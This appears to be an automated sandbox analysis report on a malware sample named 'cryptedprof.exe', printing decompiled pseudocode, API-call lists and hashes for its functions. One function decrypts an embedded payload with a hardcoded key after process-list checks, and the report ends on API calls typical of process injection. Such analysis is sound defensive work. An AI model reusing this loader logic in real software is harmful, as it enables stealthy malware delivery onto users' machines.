                                                                                        				_v36.Dacl = 0x408374;
                                                                                        				_v16.nLength = 0xc;
                                                                                        				_t22 = CreateDirectoryA(_a4,  &_v16); // executed
                                                                                        				if(_t22 != 0) {
                                                                                        					L1:
                                                                                        					return 0;
                                                                                        				}
                                                                                        				_t23 = GetLastError();
                                                                                        				if(_t23 == 0xb7) {
                                                                                        					if(SetFileSecurityA(_a4, 0x80000007,  &_v36) != 0) {
                                                                                        						goto L1;
                                                                                        					}
                                                                                        					return GetLastError();
                                                                                        				}
                                                                                        				return _t23;
                                                                                        			}








                                                                                        APIs
                                                                                        • CreateDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\), ref: 0040587D
                                                                                        • GetLastError.KERNEL32 ref: 00405891
                                                                                        • SetFileSecurityA.ADVAPI32(?,80000007,00000001), ref: 004058A6
                                                                                        • GetLastError.KERNEL32 ref: 004058B0
                                                                                        Strings
                                                                                        • C:\Users\user\Desktop, xrefs: 0040583A
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405860
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: ErrorLast$CreateDirectoryFileSecurity
                                                                                        • String ID: C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop
                                                                                        • API String ID: 3449924974-1229045261
                                                                                        • Opcode ID: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                                                                                        • Instruction ID: 86bcb966140a1f7c96d74b09234fd9797acdbeb10da2454792965a81b57d7874
                                                                                        • Opcode Fuzzy Hash: df2ca303ac227c9e0d0fbc5e27afd1aa0bff8a01fb2d8cf1edb312bec269ebc1
                                                                                        • Instruction Fuzzy Hash: 80011A72D00219DAEF10DFA0C944BEFBBB8EF04355F00803ADA45B6290D7799659CF99
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E004065E8(intOrPtr _a4) {
                                                                                        				char _v292;
                                                                                        				int _t10;
                                                                                        				struct HINSTANCE__* _t14;
                                                                                        				void* _t16;
                                                                                        				void* _t21;
                                                                                        
                                                                                        				_t10 = GetSystemDirectoryA( &_v292, 0x104);
                                                                                        				if(_t10 > 0x104) {
                                                                                        					_t10 = 0;
                                                                                        				}
                                                                                        				if(_t10 == 0 ||  *((char*)(_t21 + _t10 - 0x121)) == 0x5c) {
                                                                                        					_t16 = 1;
                                                                                        				} else {
                                                                                        					_t16 = 0;
                                                                                        				}
                                                                                        				_t5 = _t16 + 0x40a014; // 0x5c
                                                                                        				wsprintfA(_t21 + _t10 - 0x120, "%s%s.dll", _t5, _a4);
                                                                                        				_t14 = LoadLibraryExA( &_v292, 0, 8); // executed
                                                                                        				return _t14;
                                                                                        			}









                                                                                        APIs
                                                                                        • GetSystemDirectoryA.KERNEL32 ref: 004065FF
                                                                                        • wsprintfA.USER32 ref: 00406638
                                                                                        • LoadLibraryExA.KERNELBASE(?,00000000,00000008), ref: 0040664C
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: DirectoryLibraryLoadSystemwsprintf
                                                                                        • String ID: %s%s.dll$UXTHEME$\
                                                                                        • API String ID: 2200240437-4240819195
                                                                                        • Opcode ID: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                                                                                        • Instruction ID: 7902db4e393e31f005eed81eae05c73ad43ba894215c6af4be7b8d9a3309d3f8
                                                                                        • Opcode Fuzzy Hash: dd037f00298a2975fe7e642a10d0852ddcb34bcb2038a79f7270f2bd0b83f80d
                                                                                        • Instruction Fuzzy Hash: 26F0217050020967EB149764DD0DFFB375CAB08304F14047BA586F10D1DAB9D5358F6D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 71%
                                                                                        			E6FC242BE(void* __ecx, void* __edx, void* __eflags, WCHAR* _a4) {
                                                                                        				intOrPtr _v8;
                                                                                        				signed int _v12;
                                                                                        				signed int _v16;
                                                                                        				signed int _v20;
                                                                                        				char _v24;
                                                                                        				char _v25;
                                                                                        				char _v26;
                                                                                        				char _v27;
                                                                                        				char _v28;
                                                                                        				char _v29;
                                                                                        				char _v30;
                                                                                        				char _v31;
                                                                                        				char _v32;
                                                                                        				char _v33;
                                                                                        				char _v34;
                                                                                        				char _v35;
                                                                                        				char _v36;
                                                                                        				char _v37;
                                                                                        				char _v38;
                                                                                        				char _v39;
                                                                                        				char _v40;
                                                                                        				char _v41;
                                                                                        				char _v42;
                                                                                        				char _v43;
                                                                                        				char _v44;
                                                                                        				char _v45;
                                                                                        				char _v46;
                                                                                        				char _v47;
                                                                                        				char _v48;
                                                                                        				char _v49;
                                                                                        				char _v50;
                                                                                        				char _v51;
                                                                                        				char _v52;
                                                                                        				char _v53;
                                                                                        				char _v54;
                                                                                        				char _v55;
                                                                                        				char _v56;
                                                                                        				intOrPtr _v60;
                                                                                        				intOrPtr _v64;
                                                                                        				intOrPtr _v68;
                                                                                        				intOrPtr _v72;
                                                                                        				intOrPtr _v76;
                                                                                        				intOrPtr _v80;
                                                                                        				long _v84;
                                                                                        				intOrPtr _v88;
                                                                                        				intOrPtr _v92;
                                                                                        				intOrPtr _v96;
                                                                                        				intOrPtr _v100;
                                                                                        				intOrPtr _v104;
                                                                                        				intOrPtr _v108;
                                                                                        				intOrPtr _v112;
                                                                                        				signed int _v116;
                                                                                        				intOrPtr _v120;
                                                                                        				intOrPtr _v124;
                                                                                        				char _v140;
                                                                                        				char _v208;
                                                                                        				char _v1248;
                                                                                        				signed int _t124;
                                                                                        				void* _t126;
                                                                                        				void* _t130;
                                                                                        				signed int _t131;
                                                                                        				void* _t132;
                                                                                        				int _t134;
                                                                                        				int _t137;
                                                                                        				signed int _t147;
                                                                                        				void* _t149;
                                                                                        				signed int _t150;
                                                                                        				void* _t152;
                                                                                        				signed int _t153;
                                                                                        				void* _t155;
                                                                                        				void* _t156;
                                                                                        				void* _t157;
                                                                                        				void* _t158;
                                                                                        				void* _t159;
                                                                                        
                                                                                        				_t159 = __eflags;
                                                                                        				_t157 = __edx;
                                                                                        				_t156 = __ecx;
                                                                                        				_v20 = _v20 & 0x00000000;
                                                                                        				_v84 = _v84 & 0x00000000;
                                                                                        				_v56 = 0x61;
                                                                                        				_v55 = 0x36;
                                                                                        				_v54 = 0x32;
                                                                                        				_v53 = 0x61;
                                                                                        				_v52 = 0x62;
                                                                                        				_v51 = 0x31;
                                                                                        				_v50 = 0x37;
                                                                                        				_v49 = 0x34;
                                                                                        				_v48 = 0x34;
                                                                                        				_v47 = 0x62;
                                                                                        				_v46 = 0x61;
                                                                                        				_v45 = 0x66;
                                                                                        				_v44 = 0x34;
                                                                                        				_v43 = 0x65;
                                                                                        				_v42 = 0x63;
                                                                                        				_v41 = 0x64;
                                                                                        				_v40 = 0x62;
                                                                                        				_v39 = 0x61;
                                                                                        				_v38 = 0x33;
                                                                                        				_v37 = 0x32;
                                                                                        				_v36 = 0x33;
                                                                                        				_v35 = 0x65;
                                                                                        				_v34 = 0x36;
                                                                                        				_v33 = 0x35;
                                                                                        				_v32 = 0x62;
                                                                                        				_v31 = 0x39;
                                                                                        				_v30 = 0x35;
                                                                                        				_v29 = 0x30;
                                                                                        				_v28 = 0x62;
                                                                                        				_v27 = 0x61;
                                                                                        				_v26 = 0x33;
                                                                                        				_v25 = 0x37;
                                                                                        				_v24 = 0;
                                                                                        				_v16 = _v16 & 0x00000000;
                                                                                        				_v116 = _v116 & 0x00000000;
                                                                                        				_v12 = _v12 & 0x00000000;
                                                                                        				_v8 = E6FC24582();
                                                                                        				_v60 = E6FC2462A(_v8, 0x34cf0bf);
                                                                                        				_v64 = E6FC2462A(_v8, 0x55e38b1f);
                                                                                        				_v68 = E6FC2462A(_v8, 0xd1775dc4);
                                                                                        				_v120 = E6FC2462A(_v8, 0xd6eb2188);
                                                                                        				_v96 = E6FC2462A(_v8, 0xa2eae210);
                                                                                        				_v124 = E6FC2462A(_v8, 0xcd8538b2);
                                                                                        				_v72 = E6FC2462A(_v8, 0x8a111d91);
                                                                                        				_v76 = E6FC2462A(_v8, 0x170c1ca1);
                                                                                        				_v80 = E6FC2462A(_v8, 0xa5f15738);
                                                                                        				_v88 = E6FC2462A(_v8, 0x433a3842);
                                                                                        				_v92 = E6FC2462A(_v8, 0x2ffe2c64);
                                                                                        				_v112 = 0x2d734193;
                                                                                        				_v108 = 0x63daa681;
                                                                                        				_v104 = 0x26090612;
                                                                                        				_v100 = 0x6f28fae0;
                                                                                        				_t124 = 4;
                                                                                        				_t126 = E6FC2421B(_t159,  *((intOrPtr*)(_t158 + _t124 * 0 - 0x6c))); // executed
                                                                                        				_t160 = _t126;
                                                                                        				if(_t126 != 0) {
                                                                                        					L4:
                                                                                        					_v60(0x7918);
                                                                                        					L5:
                                                                                        					_v68(0,  &_v1248, 0x103);
                                                                                        					_t130 = CreateFileW(_a4, 0x80000000, 7, 0, 3, 0x80, 0);
                                                                                        					_v20 = _t130;
                                                                                        					if(_v20 != 0xffffffff) {
                                                                                        						_t131 = _v76(_v20, 0);
                                                                                        						_v16 = _t131;
                                                                                        						__eflags = _v16 - 0xffffffff;
                                                                                        						if(_v16 != 0xffffffff) {
                                                                                        							_t132 = VirtualAlloc(0, _v16, 0x3000, 4);
                                                                                        							_v12 = _t132;
                                                                                        							__eflags = _v12;
                                                                                        							if(_v12 != 0) {
                                                                                        								_t134 = ReadFile(_v20, _v12, _v16,  &_v84, 0);
                                                                                        								__eflags = _t134;
                                                                                        								if(_t134 != 0) {
                                                                                        									_t99 =  &_v56; // 0x61
                                                                                        									E6FC2401F(_v12, _t99, 0x20);
                                                                                        									_t137 = E6FC23034(_t156, _t157, __eflags, _v12); // executed
                                                                                        									__eflags = _t137;
                                                                                        									if(_t137 != 0) {
                                                                                        										_v60(0xbb8);
                                                                                        										E6FC23005(_t156,  &_v140, 0x10);
                                                                                        										E6FC23005(_t156,  &_v208, 0x44);
                                                                                        										_t137 = _v96( &_v1248, _v92(0, 0, 0, 0x20, 0, 0,  &_v208,  &_v140));
                                                                                        										__eflags = _t137;
                                                                                        										if(_t137 != 0) {
                                                                                        											_t137 = _v64(0);
                                                                                        										}
                                                                                        									}
                                                                                        									ExitProcess(0);
                                                                                        								}
                                                                                        								return _t134;
                                                                                        							}
                                                                                        							return _t132;
                                                                                        						}
                                                                                        						return _t131;
                                                                                        					}
                                                                                        					return _t130;
                                                                                        				}
                                                                                        				_t147 = 4;
                                                                                        				_t149 = E6FC2421B(_t160,  *((intOrPtr*)(_t158 + (_t147 << 0) - 0x6c))); // executed
                                                                                        				_t161 = _t149;
                                                                                        				if(_t149 != 0) {
                                                                                        					goto L4;
                                                                                        				}
                                                                                        				_t150 = 4;
                                                                                        				_t152 = E6FC2421B(_t161,  *((intOrPtr*)(_t158 + (_t150 << 1) - 0x6c))); // executed
                                                                                        				_t162 = _t152;
                                                                                        				if(_t152 != 0) {
                                                                                        					goto L4;
                                                                                        				}
                                                                                        				_t153 = 4;
                                                                                        				_t155 = E6FC2421B(_t162,  *((intOrPtr*)(_t158 + _t153 * 3 - 0x6c))); // executed
                                                                                        				if(_t155 == 0) {
                                                                                        					goto L5;
                                                                                        				}
                                                                                        				goto L4;
                                                                                        			}














































































                                                                                        APIs
                                                                                          • Part of subcall function 6FC2421B: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,873D1860,?,5C7BF6E9,?,EA31D3B6), ref: 6FC24260
                                                                                        • CreateFileW.KERNELBASE(00000000,80000000,00000007,00000000,00000003,00000080,00000000), ref: 6FC244AC
                                                                                          • Part of subcall function 6FC2421B: Process32FirstW.KERNEL32(000000FF,0000022C), ref: 6FC24284
                                                                                        • VirtualAlloc.KERNELBASE(00000000,000000FF,00003000,00000004), ref: 6FC244DF
                                                                                          • Part of subcall function 6FC2421B: Process32NextW.KERNEL32(000000FF,0000022C), ref: 6FC242AF
                                                                                        • ReadFile.KERNELBASE(000000FF,00000000,000000FF,00000000,00000000), ref: 6FC244FF
                                                                                        • ExitProcess.KERNEL32(00000000,00000000), ref: 6FC24579
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.336002347.000000006FC23000.00000040.00020000.sdmp, Offset: 6FC20000, based on PE: true
                                                                                        • Associated: 00000001.00000002.335954457.000000006FC20000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.335970994.000000006FC21000.00000080.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.335995426.000000006FC22000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.336018479.000000006FC25000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: CreateFileProcess32$AllocExitFirstNextProcessReadSnapshotToolhelp32Virtual
                                                                                        • String ID: a62ab1744baf4ecdba323e65b950ba37
                                                                                        • API String ID: 1567874941-778335501
                                                                                        • Opcode ID: fdcccdf1bb3976d6cc8d99eb04027da88de56eb45701c987bb00351068814252
                                                                                        • Instruction ID: 22de150b6c85ad8c3aa3ef837bfac7901c50cf7e019beeaec03f415fcf4e272f
                                                                                        • Opcode Fuzzy Hash: fdcccdf1bb3976d6cc8d99eb04027da88de56eb45701c987bb00351068814252
                                                                                        • Instruction Fuzzy Hash: 47913530D44388EAEF129BE4DC09BDDBFB5BF04709F1440A5E640BA1D2E7B60A59CB25
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 93%
                                                                                        			E004032BF(intOrPtr _a4) {
                                                                                        				intOrPtr _t11;
                                                                                        				signed int _t12;
                                                                                        				void* _t15;
                                                                                        				long _t16;
                                                                                        				void* _t18;
                                                                                        				intOrPtr _t30;
                                                                                        				intOrPtr _t33;
                                                                                        				intOrPtr _t35;
                                                                                        				void* _t36;
                                                                                        				intOrPtr _t48;
                                                                                        
                                                                                        				_t33 =  *0x429464 -  *0x40b898 + _a4;
                                                                                        				 *0x42f450 = GetTickCount() + 0x1f4;
                                                                                        				if(_t33 <= 0) {
                                                                                        					L22:
                                                                                        					E00402E52(1);
                                                                                        					return 0;
                                                                                        				}
                                                                                        				E0040343E( *0x429474);
                                                                                        				SetFilePointer( *0x40a01c,  *0x40b898, 0, 0); // executed
                                                                                        				 *0x429470 = _t33;
                                                                                        				 *0x429460 = 0;
                                                                                        				while(1) {
                                                                                        					_t30 = 0x4000;
                                                                                        					_t11 =  *0x429468 -  *0x429474;
                                                                                        					if(_t11 <= 0x4000) {
                                                                                        						_t30 = _t11;
                                                                                        					}
                                                                                        					_t12 = E00403428(0x41d460, _t30);
                                                                                        					if(_t12 == 0) {
                                                                                        						break;
                                                                                        					}
                                                                                        					 *0x429474 =  *0x429474 + _t30;
                                                                                        					 *0x40b8a0 = 0x41d460;
                                                                                        					 *0x40b8a4 = _t30;
                                                                                        					L6:
                                                                                        					L6:
                                                                                        					if( *0x42f454 != 0 &&  *0x42f500 == 0) {
                                                                                        						 *0x429460 =  *0x429470 -  *0x429464 - _a4 +  *0x40b898;
                                                                                        						E00402E52(0);
                                                                                        					}
                                                                                        					 *0x40b8a8 = 0x415460;
                                                                                        					 *0x40b8ac = 0x8000;
                                                                                        					if(E0040677B(?str?) < 0) {
                                                                                        						goto L20;
                                                                                        					}
                                                                                        					_t35 =  *0x40b8a8; // 0x41797f
                                                                                        					_t36 = _t35 - 0x415460;
                                                                                        					if(_t36 == 0) {
                                                                                        						__eflags =  *0x40b8a4; // 0x0
                                                                                        						if(__eflags != 0) {
                                                                                        							goto L20;
                                                                                        						}
                                                                                        						__eflags = _t30;
                                                                                        						if(_t30 == 0) {
                                                                                        							goto L20;
                                                                                        						}
                                                                                        						L16:
                                                                                        						_t16 =  *0x429464;
                                                                                        						if(_t16 -  *0x40b898 + _a4 > 0) {
                                                                                        							continue;
                                                                                        						}
                                                                                        						SetFilePointer( *0x40a01c, _t16, 0, 0); // executed
                                                                                        						goto L22;
                                                                                        					}
                                                                                        					_t18 = E00405E8D( *0x40a01c, 0x415460, _t36); // executed
                                                                                        					if(_t18 == 0) {
                                                                                        						_push(0xfffffffe);
                                                                                        						L21:
                                                                                        						_pop(_t15);
                                                                                        						return _t15;
                                                                                        					}
                                                                                        					 *0x40b898 =  *0x40b898 + _t36;
                                                                                        					_t48 =  *0x40b8a4; // 0x0
                                                                                        					if(_t48 != 0) {
                                                                                        						goto L6;
                                                                                        					}
                                                                                        					goto L16;
                                                                                        					L20:
                                                                                        					_push(0xfffffffd);
                                                                                        					goto L21;
                                                                                        				}
                                                                                        				return _t12 | 0xffffffff;
                                                                                        			}














                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 004032D3
                                                                                          • Part of subcall function 0040343E: SetFilePointer.KERNELBASE(00000000,00000000,00000000,0040313E,?), ref: 0040344C
                                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,?,00000000,004031E9,00000004,00000000,00000000,?,?,00403165,000000FF,00000000,00000000,0040A130,?), ref: 00403306
                                                                                        • SetFilePointer.KERNELBASE(?,00000000,00000000,NA,0041D460,00004000,?,00000000,004031E9,00000004,00000000,00000000,?,?,00403165,000000FF), ref: 00403401
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: FilePointer$CountTick
                                                                                        • String ID: NA$`TA
                                                                                        • API String ID: 1092082344-131641330
                                                                                        • Opcode ID: ddf88972be424b0b842bd0ca3aed5b91ca801b40ce3928dce7bc125f03cf72b3
                                                                                        • Instruction ID: bb82d22d1a80a93a7495f99719332701a8bc5653d470bc60fdd2df8261a6fa09
                                                                                        • Opcode Fuzzy Hash: ddf88972be424b0b842bd0ca3aed5b91ca801b40ce3928dce7bc125f03cf72b3
                                                                                        • Instruction Fuzzy Hash: 3A31B3726042159FDB10BF29EE849263BACFB40359B88813BE405B62F1C7785C428A9D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E00405E15(char _a4, intOrPtr _a6, CHAR* _a8) {
                                                                                        				char _t11;
                                                                                        				signed int _t12;
                                                                                        				int _t15;
                                                                                        				signed int _t17;
                                                                                        				void* _t20;
                                                                                        				CHAR* _t21;
                                                                                        
                                                                                        				_t21 = _a4;
                                                                                        				_t20 = 0x64;
                                                                                        				while(1) {
                                                                                        					_t11 =  *0x40a3ec; // 0x61736e
                                                                                        					_t20 = _t20 - 1;
                                                                                        					_a4 = _t11;
                                                                                        					_t12 = GetTickCount();
                                                                                        					_t17 = 0x1a;
                                                                                        					_a6 = _a6 + _t12 % _t17;
                                                                                        					_t15 = GetTempFileNameA(_a8,  &_a4, 0, _t21); // executed
                                                                                        					if(_t15 != 0) {
                                                                                        						break;
                                                                                        					}
                                                                                        					if(_t20 != 0) {
                                                                                        						continue;
                                                                                        					}
                                                                                        					 *_t21 =  *_t21 & 0x00000000;
                                                                                        					return _t15;
                                                                                        				}
                                                                                        				return _t21;
                                                                                        			}










                                                                                        APIs
                                                                                        • GetTickCount.KERNEL32 ref: 00405E29
                                                                                        • GetTempFileNameA.KERNELBASE(?,?,00000000,?,?,00000007,00000009,0000000B), ref: 00405E43
                                                                                        Strings
                                                                                        • nsa, xrefs: 00405E20
                                                                                        • "C:\Users\user\Desktop\cryptedprof.exe" , xrefs: 00405E15
                                                                                        • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E18
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.334715808.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000001.00000002.334705910.0000000000400000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334725747.0000000000408000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334731903.000000000040A000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334747539.000000000041D000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334754170.000000000042C000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334759137.0000000000435000.00000004.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.334765630.0000000000438000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: CountFileNameTempTick
                                                                                        • String ID: "C:\Users\user\Desktop\cryptedprof.exe" $C:\Users\user\AppData\Local\Temp\$nsa
                                                                                        • API String ID: 1716503409-2530712695
                                                                                        • Opcode ID: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
                                                                                        • Instruction ID: 94097d04b6c38ee8b1870d6a931f35239ed30ef0cd20ec9d97f11959184772c3
                                                                                        • Opcode Fuzzy Hash: 6f67c72f8a62f6904c1c8d13d4c39cdc389fdf02a571d79ef00f96109094c4c4
                                                                                        • Instruction Fuzzy Hash: E4F0A7363442087BDB109F55EC44B9B7B9DDF91750F14C03BF984DA1C0D6B0D9988798
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 94%
                                                                                        			E709916DB(void* __edx, void* __edi, void* __esi, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                        				void _v36;
                                                                                        				char _v88;
                                                                                        				struct HINSTANCE__* _t37;
                                                                                        				intOrPtr _t42;
                                                                                        				void* _t48;
                                                                                        				void* _t49;
                                                                                        				void* _t50;
                                                                                        				void* _t54;
                                                                                        				intOrPtr _t57;
                                                                                        				signed int _t61;
                                                                                        				signed int _t63;
                                                                                        				void* _t67;
                                                                                        				void* _t68;
                                                                                        				void* _t72;
                                                                                        				void* _t76;
                                                                                        
                                                                                        				_t76 = __esi;
                                                                                        				_t68 = __edi;
                                                                                        				_t67 = __edx;
                                                                                        				 *0x7099405c = _a8;
                                                                                        				 *0x70994060 = _a16;
                                                                                        				 *0x70994064 = _a12;
                                                                                        				 *((intOrPtr*)(_a20 + 0xc))( *0x70994038, E70991556);
                                                                                        				_push(1); // executed
                                                                                        				_t37 = E70991A98(); // executed
                                                                                        				_t54 = _t37;
                                                                                        				if(_t54 == 0) {
                                                                                        					L28:
                                                                                        					return _t37;
                                                                                        				} else {
                                                                                        					if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                                                        						E709922AF(_t54);
                                                                                        					}
                                                                                        					E709922F1(_t67, _t54);
                                                                                        					_t57 =  *((intOrPtr*)(_t54 + 4));
                                                                                        					if(_t57 == 0xffffffff) {
                                                                                        						L14:
                                                                                        						if(( *(_t54 + 0x810) & 0x00000004) == 0) {
                                                                                        							if( *((intOrPtr*)(_t54 + 4)) == 0) {
                                                                                        								_t37 = E709924D8(_t54);
                                                                                        							} else {
                                                                                        								_push(_t76);
                                                                                        								_push(_t68);
                                                                                        								_t61 = 8;
                                                                                        								_t13 = _t54 + 0x818; // 0x818
                                                                                        								memcpy( &_v36, _t13, _t61 << 2);
                                                                                        								_t42 = E7099156B(_t54,  &_v88);
                                                                                        								 *(_t54 + 0x834) =  *(_t54 + 0x834) & 0x00000000;
                                                                                        								_t18 = _t54 + 0x818; // 0x818
                                                                                        								_t72 = _t18;
                                                                                        								 *((intOrPtr*)(_t54 + 0x820)) = _t42;
                                                                                        								 *_t72 = 3;
                                                                                        								E709924D8(_t54);
                                                                                        								_t63 = 8;
                                                                                        								_t37 = memcpy(_t72,  &_v36, _t63 << 2);
                                                                                        							}
                                                                                        						} else {
                                                                                        							E709924D8(_t54);
                                                                                        							_t37 = GlobalFree(E70991266(E70991559(_t54)));
                                                                                        						}
                                                                                        						if( *((intOrPtr*)(_t54 + 4)) != 1) {
                                                                                        							_t37 = E7099249E(_t54);
                                                                                        							if(( *(_t54 + 0x810) & 0x00000040) != 0 &&  *_t54 == 1) {
                                                                                        								_t37 =  *(_t54 + 0x808);
                                                                                        								if(_t37 != 0) {
                                                                                        									_t37 = FreeLibrary(_t37);
                                                                                        								}
                                                                                        							}
                                                                                        							if(( *(_t54 + 0x810) & 0x00000020) != 0) {
                                                                                        								_t37 = E709914E2( *0x70994058);
                                                                                        							}
                                                                                        						}
                                                                                        						if(( *(_t54 + 0x810) & 0x00000002) != 0) {
                                                                                        							goto L28;
                                                                                        						} else {
                                                                                        							return GlobalFree(_t54);
                                                                                        						}
                                                                                        					}
                                                                                        					_t48 =  *_t54;
                                                                                        					if(_t48 == 0) {
                                                                                        						if(_t57 != 1) {
                                                                                        							goto L14;
                                                                                        						}
                                                                                        						E70992CC3(_t54);
                                                                                        						L12:
                                                                                        						_t54 = _t48;
                                                                                        						L13:
                                                                                        						goto L14;
                                                                                        					}
                                                                                        					_t49 = _t48 - 1;
                                                                                        					if(_t49 == 0) {
                                                                                        						L8:
                                                                                        						_t48 = E70992A38(_t57, _t54); // executed
                                                                                        						goto L12;
                                                                                        					}
                                                                                        					_t50 = _t49 - 1;
                                                                                        					if(_t50 == 0) {
                                                                                        						E709926B2(_t54);
                                                                                        						goto L13;
                                                                                        					}
                                                                                        					if(_t50 != 1) {
                                                                                        						goto L14;
                                                                                        					}
                                                                                        					goto L8;
                                                                                        				}
                                                                                        			}



















                                                                                        APIs
                                                                                          • Part of subcall function 70991A98: GlobalFree.KERNEL32 ref: 70991D09
                                                                                          • Part of subcall function 70991A98: GlobalFree.KERNEL32 ref: 70991D0E
                                                                                          • Part of subcall function 70991A98: GlobalFree.KERNEL32 ref: 70991D13
                                                                                        • GlobalFree.KERNEL32 ref: 70991786
                                                                                        • FreeLibrary.KERNEL32(?), ref: 70991809
                                                                                        • GlobalFree.KERNEL32 ref: 7099182E
                                                                                          • Part of subcall function 709922AF: GlobalAlloc.KERNEL32(00000040,?), ref: 709922E0
                                                                                          • Part of subcall function 709926B2: GlobalAlloc.KERNEL32(00000040,00000000,?,?,00000000,?,?,?,70991757,00000000), ref: 70992782
                                                                                          • Part of subcall function 7099156B: wsprintfA.USER32 ref: 70991599
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.336061251.0000000070991000.00000020.00020000.sdmp, Offset: 70990000, based on PE: true
                                                                                        • Associated: 00000001.00000002.336043646.0000000070990000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.336078624.0000000070993000.00000002.00020000.sdmp
                                                                                        • Associated: 00000001.00000002.336140762.0000000070995000.00000002.00020000.sdmp
                                                                                        Similarity
                                                                                        • API ID: Global$Free$Alloc$Librarywsprintf
                                                                                        • String ID:
                                                                                        • API String ID: 3962662361-3916222277
                                                                                        • Opcode ID: 5bee8ac8f63320ca8735f6739b0b2e3553be0ff2c4e53b1ce5b957ddf4688833
                                                                                        • Instruction ID: e49e9e36cb9c0f6906f724e2a5ae87d3cbec3a7df2cba9951ddbc0250f6609be
                                                                                        • Opcode Fuzzy Hash: 5bee8ac8f63320ca8735f6739b0b2e3553be0ff2c4e53b1ce5b957ddf4688833
                                                                                        • Instruction Fuzzy Hash: 0D41C272120205DFCB019FA5CD85BDE37ACBBC4218F148439F907AA296DB74A845D7AB
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 6FC23373
                                                                                        • GetThreadContext.KERNELBASE(?,00010007), ref: 6FC23396
                                                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 6FC233BA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.336002347.000000006FC23000.00000040.00020000.sdmp, Offset: 6FC20000, based on PE: true
                                                                                        • Associated: 00000001.00000002.335954457.000000006FC20000.00000002.00020000.sdmp
